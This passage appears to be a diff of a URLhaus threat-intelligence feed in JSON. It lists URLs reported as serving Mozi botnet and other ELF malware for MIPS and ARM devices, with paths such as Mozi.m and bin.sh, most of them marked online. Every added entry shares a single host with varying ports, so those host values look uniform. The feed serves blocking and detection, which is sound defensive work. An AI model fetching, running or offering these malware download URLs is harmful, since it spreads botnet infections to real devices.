UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961303","urlhaus_reference":"https://urlhaus.abuse.ch/url/961303/","url":"http://182.126.89.215:57992/Mozi.a","url_status":"online","host":"182.126.89.215","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961304","urlhaus_reference":"https://urlhaus.abuse.ch/url/961304/","url":"http://27.219.111.198:43603/Mozi.m","url_status":"online","host":"27.219.111.198","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961305","urlhaus_reference":"https://urlhaus.abuse.ch/url/961305/","url":"http://27.219.76.18:37157/Mozi.a","url_status":"online","host":"27.219.76.18","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961306","urlhaus_reference":"https://urlhaus.abuse.ch/url/961306/","url":"http://185.246.178.200:37229/Mozi.m","url_status":"online","host":"185.246.178.200","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961307","urlhaus_reference":"https://urlhaus.abuse.ch/url/961307/","url":"http://222.136.88.171:49104/Mozi.m","url_status":"online","host":"222.136.88.171","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961308","urlhaus_reference":"https://urlhaus.abuse.ch/url/961308/","url":"http://61.53.193.78:49575/Mozi.m","url_status":"online","host":"61.53.193.78","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961299","urlhaus_reference":"https://urlhaus.abuse.ch/url/961299/","url":"http://112.234.38.83:50000/Mozi.a","url_status":"online","host":"112.234.38.83","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961300","urlhaus_reference":"https://urlhaus.abuse.ch/url/961300/","url":"http://115.50.226.131:36251/Mozi.m","url_status":"online","host":"115.50.226.131","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961301","urlhaus_reference":"https://urlhaus.abuse.ch/url/961301/","url":"http://116.25.134.26:51932/Mozi.m","url_status":"online","host":"116.25.134.26","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961297","urlhaus_reference":"https://urlhaus.abuse.ch/url/961297/","url":"http://116.75.197.211:45660/Mozi.m","url_status":"online","host":"116.75.197.211","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961298","urlhaus_reference":"https://urlhaus.abuse.ch/url/961298/","url":"http://112.240.79.242:42478/Mozi.m","url_status":"online","host":"112.240.79.242","date_added":"2021-01-14 19:35:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961296","urlhaus_reference":"https://urlhaus.abuse.ch/url/961296/","url":"http://103.243.184.54:50726/Mozi.m","url_status":"online","host":"103.243.184.54","date_added":"2021-01-14 19:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961295","urlhaus_reference":"https://urlhaus.abuse.ch/url/961295/","url":"http://59.99.93.45:40256/i","url_status":"offline","host":"59.99.93.45","date_added":"2021-01-14 19:33:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961294","urlhaus_reference":"https://urlhaus.abuse.ch/url/961294/","url":"http://182.113.226.63:50971/bin.sh","url_status":"online","host":"182.113.226.63","date_added":"2021-01-14 19:29:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961403","urlhaus_reference":"https://urlhaus.abuse.ch/url/961403/","url":"http://89.160.20.156:50611/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:39:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961402","urlhaus_reference":"https://urlhaus.abuse.ch/url/961402/","url":"http://89.160.20.156:45371/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961400","urlhaus_reference":"https://urlhaus.abuse.ch/url/961400/","url":"http://89.160.20.156:50093/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961401","urlhaus_reference":"https://urlhaus.abuse.ch/url/961401/","url":"http://89.160.20.156:36652/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961397","urlhaus_reference":"https://urlhaus.abuse.ch/url/961397/","url":"http://89.160.20.156:54182/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961398","urlhaus_reference":"https://urlhaus.abuse.ch/url/961398/","url":"http://89.160.20.156:46048/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961399","urlhaus_reference":"https://urlhaus.abuse.ch/url/961399/","url":"http://89.160.20.156:33953/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961393","urlhaus_reference":"https://urlhaus.abuse.ch/url/961393/","url":"http://89.160.20.156:36447/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:35:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961394","urlhaus_reference":"https://urlhaus.abuse.ch/url/961394/","url":"http://89.160.20.156:36828/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961395","urlhaus_reference":"https://urlhaus.abuse.ch/url/961395/","url":"http://89.160.20.156:55281/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961396","urlhaus_reference":"https://urlhaus.abuse.ch/url/961396/","url":"http://89.160.20.156:49772/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961391","urlhaus_reference":"https://urlhaus.abuse.ch/url/961391/","url":"http://89.160.20.156:50229/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961392","urlhaus_reference":"https://urlhaus.abuse.ch/url/961392/","url":"http://89.160.20.156:39996/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961387","urlhaus_reference":"https://urlhaus.abuse.ch/url/961387/","url":"http://89.160.20.156:50195/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961388","urlhaus_reference":"https://urlhaus.abuse.ch/url/961388/","url":"http://89.160.20.156:52447/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961389","urlhaus_reference":"https://urlhaus.abuse.ch/url/961389/","url":"http://89.160.20.156:56321/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961390","urlhaus_reference":"https://urlhaus.abuse.ch/url/961390/","url":"http://89.160.20.156:54620/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961386","urlhaus_reference":"https://urlhaus.abuse.ch/url/961386/","url":"http://89.160.20.156:52064/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:23:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961385","urlhaus_reference":"https://urlhaus.abuse.ch/url/961385/","url":"http://89.160.20.156:47401/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:22:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961382","urlhaus_reference":"https://urlhaus.abuse.ch/url/961382/","url":"http://89.160.20.156:46527/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961383","urlhaus_reference":"https://urlhaus.abuse.ch/url/961383/","url":"http://89.160.20.156:38132/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961384","urlhaus_reference":"https://urlhaus.abuse.ch/url/961384/","url":"http://89.160.20.156:59015/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961379","urlhaus_reference":"https://urlhaus.abuse.ch/url/961379/","url":"http://89.160.20.156:59454/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961380","urlhaus_reference":"https://urlhaus.abuse.ch/url/961380/","url":"http://89.160.20.156:37883/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961381","urlhaus_reference":"https://urlhaus.abuse.ch/url/961381/","url":"http://89.160.20.156:55209/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961378","urlhaus_reference":"https://urlhaus.abuse.ch/url/961378/","url":"http://89.160.20.156:41062/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:21:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961377","urlhaus_reference":"https://urlhaus.abuse.ch/url/961377/","url":"http://89.160.20.156:60380/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961375","urlhaus_reference":"https://urlhaus.abuse.ch/url/961375/","url":"http://89.160.20.156:54796/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961376","urlhaus_reference":"https://urlhaus.abuse.ch/url/961376/","url":"http://89.160.20.156:35251/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961373","urlhaus_reference":"https://urlhaus.abuse.ch/url/961373/","url":"http://89.160.20.156:50562/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:20:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961374","urlhaus_reference":"https://urlhaus.abuse.ch/url/961374/","url":"http://89.160.20.156:33445/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961370","urlhaus_reference":"https://urlhaus.abuse.ch/url/961370/","url":"http://89.160.20.156:60280/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961371","urlhaus_reference":"https://urlhaus.abuse.ch/url/961371/","url":"http://89.160.20.156:46386/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961372","urlhaus_reference":"https://urlhaus.abuse.ch/url/961372/","url":"http://89.160.20.156:60288/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961368","urlhaus_reference":"https://urlhaus.abuse.ch/url/961368/","url":"http://89.160.20.156:49731/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961369","urlhaus_reference":"https://urlhaus.abuse.ch/url/961369/","url":"http://89.160.20.156:38837/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961366","urlhaus_reference":"https://urlhaus.abuse.ch/url/961366/","url":"http://89.160.20.156:37814/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961367","urlhaus_reference":"https://urlhaus.abuse.ch/url/961367/","url":"http://89.160.20.156:47507/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961365","urlhaus_reference":"https://urlhaus.abuse.ch/url/961365/","url":"http://89.160.20.156:47140/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:18:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961363","urlhaus_reference":"https://urlhaus.abuse.ch/url/961363/","url":"http://89.160.20.156:41514/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961364","urlhaus_reference":"https://urlhaus.abuse.ch/url/961364/","url":"http://89.160.20.156:58748/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:11 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961362","urlhaus_reference":"https://urlhaus.abuse.ch/url/961362/","url":"http://89.160.20.156:51183/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961361","urlhaus_reference":"https://urlhaus.abuse.ch/url/961361/","url":"http://89.160.20.156:42104/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961354","urlhaus_reference":"https://urlhaus.abuse.ch/url/961354/","url":"http://89.160.20.156:53130/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961355","urlhaus_reference":"https://urlhaus.abuse.ch/url/961355/","url":"http://89.160.20.156:57768/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961356","urlhaus_reference":"https://urlhaus.abuse.ch/url/961356/","url":"http://89.160.20.156:34541/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961357","urlhaus_reference":"https://urlhaus.abuse.ch/url/961357/","url":"http://89.160.20.156:51344/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961358","urlhaus_reference":"https://urlhaus.abuse.ch/url/961358/","url":"http://89.160.20.156:40084/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961359","urlhaus_reference":"https://urlhaus.abuse.ch/url/961359/","url":"http://89.160.20.156:60457/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961360","urlhaus_reference":"https://urlhaus.abuse.ch/url/961360/","url":"http://89.160.20.156:34906/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961353","urlhaus_reference":"https://urlhaus.abuse.ch/url/961353/","url":"http://89.160.20.156:59847/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961352","urlhaus_reference":"https://urlhaus.abuse.ch/url/961352/","url":"http://89.160.20.156:47873/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:09:00 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961349","urlhaus_reference":"https://urlhaus.abuse.ch/url/961349/","url":"http://89.160.20.156:48645/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961350","urlhaus_reference":"https://urlhaus.abuse.ch/url/961350/","url":"http://89.160.20.156:36524/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961351","urlhaus_reference":"https://urlhaus.abuse.ch/url/961351/","url":"http://89.160.20.156:38726/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961345","urlhaus_reference":"https://urlhaus.abuse.ch/url/961345/","url":"http://89.160.20.156:41149/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961346","urlhaus_reference":"https://urlhaus.abuse.ch/url/961346/","url":"http://89.160.20.156:46993/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961347","urlhaus_reference":"https://urlhaus.abuse.ch/url/961347/","url":"http://89.160.20.156:39190/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961348","urlhaus_reference":"https://urlhaus.abuse.ch/url/961348/","url":"http://89.160.20.156:48344/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961344","urlhaus_reference":"https://urlhaus.abuse.ch/url/961344/","url":"http://89.160.20.156:58427/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961343","urlhaus_reference":"https://urlhaus.abuse.ch/url/961343/","url":"http://89.160.20.156:41921/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:02:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961342","urlhaus_reference":"https://urlhaus.abuse.ch/url/961342/","url":"http://89.160.20.156:47140/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:55:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961341","urlhaus_reference":"https://urlhaus.abuse.ch/url/961341/","url":"http://89.160.20.156:34789/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:52:33 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961340","urlhaus_reference":"https://urlhaus.abuse.ch/url/961340/","url":"http://89.160.20.156:37634/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961339","urlhaus_reference":"https://urlhaus.abuse.ch/url/961339/","url":"http://89.160.20.156:41636/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961338","urlhaus_reference":"https://urlhaus.abuse.ch/url/961338/","url":"http://89.160.20.156:32907/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961336","urlhaus_reference":"https://urlhaus.abuse.ch/url/961336/","url":"http://89.160.20.156:57568/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961337","urlhaus_reference":"https://urlhaus.abuse.ch/url/961337/","url":"http://89.160.20.156:40740/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
